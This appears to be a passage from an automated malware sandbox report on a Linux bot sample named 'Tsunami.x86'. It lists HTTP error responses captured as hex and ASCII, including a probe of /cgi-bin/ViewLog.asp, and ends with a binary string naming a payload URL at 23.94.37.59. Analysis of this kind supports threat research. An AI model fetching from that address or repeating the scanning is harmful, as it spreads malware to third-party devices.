    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Mon, 01 Nov 2021 03:17:22 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 30 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Mon, 01 Nov 2021 03:17:17 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: closeAuthInfo:
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/octet-streamContent-Length: 120Connection: CloseData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 03:17:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingServer: cloudflareCF-RAY: 6a71f86dff702b4d-FRAContent-Encoding: gzipData Raw: 35 61 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 57 5b 6f db 36 14 7e f7 af 38 d5 80 ee 25 b4 2c e7 3a 47 d6 50 a4 19 96 a7 05 5b 82 ad 28 0a 83 22 8f 2c 36 14 a9 91 f4 0d db fe fb 40 52 72 95 38 cd da 87 62 7e 31 af 1f cf e5 3b 17 e5 af de fe 72 75 f7 ee f6 1a 6a d7 c8 62 94 bf 22 e4 bd a8 40 3a b8 b9 86 f3 0f 05 e4 7e 03 98 a4 d6 ce 13 a5 c9 47 0b 02 cf 40 4b 2e 30 01 49 d5 72 9e a0 22 f7 bf 25 05 e4 af de a3 e2 a2 fa 40 c8 27 a8 0e 07 e0 79 a8 f3 af 83 ba 78 01 ea e2 2b a0 96 ae 43 f3 0b cf 69 79 88 42 c8 63 a4 1a 29 2f 46 b9 13 4e 62 f1 56 18 64 0e 6e 6e 81 32 86 d6 82 d2 0e a8 94 7a 83 1c fe 86 2b a9 57 bc 92 d4 60 9e c6 0b a3 bc 41 47 81 d5 d4 58 74 f3 e4 fe ee 27 72 91 40 da 6f d4 ce b5 04 ff 5c 89 f5 3c b9 d2 ca a1 72 e4 6e d7 62 02 2c ce e6 89 c3 ad 4b bd e0 97 7b 98 97 50 fe 20 f7 6f c8 95 6e 5a ea 44 29 87 40 37 d7 f3 6b be c4 23 56 1b dd e0 3c 1b 00 28 da e0 3c 31 ba d4 ce 0e 6e 28 2d 14 c7 ed 11 28 5d 69 af e5 c1 95 b5 c0 4d ab 8d 1b 5c da 08 ee ea 39 c7 b5 60 48 c2 e4 48 28 e1 04 95 c4 32 2a f7 0f 4b a1 1e c0 a0 9c 27 d6 ed 24 da 1a d1 25 20 f8 3c 61 d5 22 2e 11 66 6d 02 b5 c1 6a 9e a4 8c 2b c2 96 22 8d 5b 69 43 85 1a 87 7d b7 6b b1 33 53 98 37 c8 05 9d 27 96 19 44 75 d4 1a fd 11 99 13 5a 85 67 47 a3 dc 32 23 5a 07 1c 2b 34 60 0d 9b 27 de 7e 76 96 a6 b4 15 63 43 39 35 63 b6 f7 e4 98 e9 26 2d 91 32 ad c6 1f 6d 52 e4 69 bc 5f 8c f2 b4 e3 46 a9 f9 ae 18 01 e4 5c ac 3b 05 c8 c6 d0 b6 45 93 f8 f5 6e a7 e3 1d ab 08 95 68 1c f4 03 82 c6 68 e3 a7 4c eb 07 81 dd bc 16 9c a3 ea 2c 12 37 c2 f1 04 38 75 94 38 43 95 95 d4 a1 27 2f 2d 25 2e e2 21 9b 14 b7 12 a9 45 88 cb d0 2d 8f f3 94 8b f5 40 9c 4e d0 f0 18 e1 e8 a8 90 de f7 51 c8 96 4c 3a d1 7d 14 22 e5 68 fa ad 66 4b e8 ca 69 68 1d c9 26 20 97 b3 d6 91 b3 f0 bf 25 17 b0 21 d3 93 b0 ba 21 d5 4a 4a 68 4a 92 9d 02 55 de ff 82 5a e4 7b d8 80 9c f5 a8 42 49 a1 90 94 52 b3 07 68 f8 ac 1b 18 32 f5 b3 a6 24 53 a8 b4 72 44 8a 65 ed c0 3b 9b 9c 4d fc 56 18 1e 6f 65 5c 2b 25 65 0f 84 53 f3 00 12 29 17 6a 49 9c bf 31 7c 15 20 b7 2d 55 87 66 f4 96 48 8a 6b ff 97 a7 fe c8 e1 a5 22 9b 4c 8e 0f 36 f3 b4 ce 86 d3 00 ff a2 62 75 27 9c a1 3b 22 78 54 ad d1 4a 47 2d b2 53 6f c1 30 b4 8d 1f f6 ba 18 94 74 eb 6d f8 2b dd c1 cd db 19 9c d1 f3 ac ba 38 e3 55 75 3e 99 96 27 1c 5e 97 2b 29 2f 0f 25 fc f6 22 4d 27 d3 8c 64 19 99 64 30 39 9e 65 e7 b3 e9 0f 70 7f 77 f5 54 94 bc 9e f6 72 04 b4 a5 7f ef 6c 32 d9 fb 2b 1b 1f c3 de a9 fd 9b d3 ad 1c f8 3f 79 31 11 e7 69 3d dd 73 37 8d e4 2d 46 fd 82 8d c9 a0 97 e1 80 af 1d bb 9b 92 5c f4 a4 7e 44 9e 7d ec 6c 6a ea 48 ed a3 5c 21 27
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: WebServerDate: Mon, 01 Nov 2021 03:17:18 GMTContent-Type: text/htmlContent-Length: 110Connection: closeData Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Wed, 25 Feb 1970 19:20:04 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Length: 0Date: Mon, 01 Nov 2021 03:17:34 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:25:20 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:17:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 00:20:00 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 01 Nov 2021 03:17:41 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 00:20:02 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 00:20:05 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 03:17:43 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 03:17:48 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 00:20:09 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:08:44 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: publicPragma: cacheExpires: Thu, 09 Jan 2003 18:44:20 GMTDate: Thu, 09 Jan 2003 18:14:20 GMTLast-Modified: Thu, 09 Jan 2003 18:14:20 GMTAccept-Ranges: bytesConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 66 66 66 66 66 66 22 3e 0a 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 68 32 3e 0a 20 20 3c 70 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found</title></head><body bgcolor="ffffff"> <h2>404 Not Found<h2> <p> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:18:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Mon, 01 Nov 2021 03:18:21 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Apache-Coyote/1.1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: 0Set-Cookie: XSRF-TOKEN=2dfd13a9-dc1a-4ec7-8c36-d1de12087d0f; Path=/Content-Type: application/json;charset=UTF-8Transfer-Encoding: chunkedDate: Mon, 01 Nov 2021 03:18:25 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpString found in binary or memory: http://23.94.37.59/bin
